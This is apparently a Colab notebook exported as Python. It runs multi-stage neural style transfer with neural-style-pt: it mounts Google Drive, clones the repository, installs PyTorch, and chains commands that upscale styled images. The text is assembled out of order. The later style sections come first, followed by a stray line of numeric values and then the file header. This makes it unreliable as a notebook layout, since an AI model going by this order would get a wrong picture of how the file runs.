!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/6A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 7 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/7A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 8 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/8A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-8.png' -tv_weight 0 -original_colors 0 -backend cudnn | 318.319149 | 850 | 0.812646 | # -*- coding: utf-8 -*-
"""Neural Style Pattern Transfer.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ijYjSvGfWm1aUkw0stn6P7U8pYwhsbU0
"""
#!nvcc --version
print("Your GPU is a ")
!nvidia-smi -L
print("GPU Logs")
print("Nvidia K80 is not enough to do past A5 for high res inputs and A7 for low res inputs")
print("Nvidia P100 will do an A8 in around 23 minutes")
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))
if ram_gb < 20:
print('Not using a high-RAM runtime')
else:
print('You are using a high-RAM runtime!')
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/ProGamerGov/neural-style-pt.git
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/channel_pruning.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nin_imagenet.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg16-00b39a1b.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg19-d01eb7cb.pth" /content/neural-style-pt/models/
!pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio===0.7.2 -f https://download.pytorch.org/whl/torch_stable.html
#---------#
# STYLE 1 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/1A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 2 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/2A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
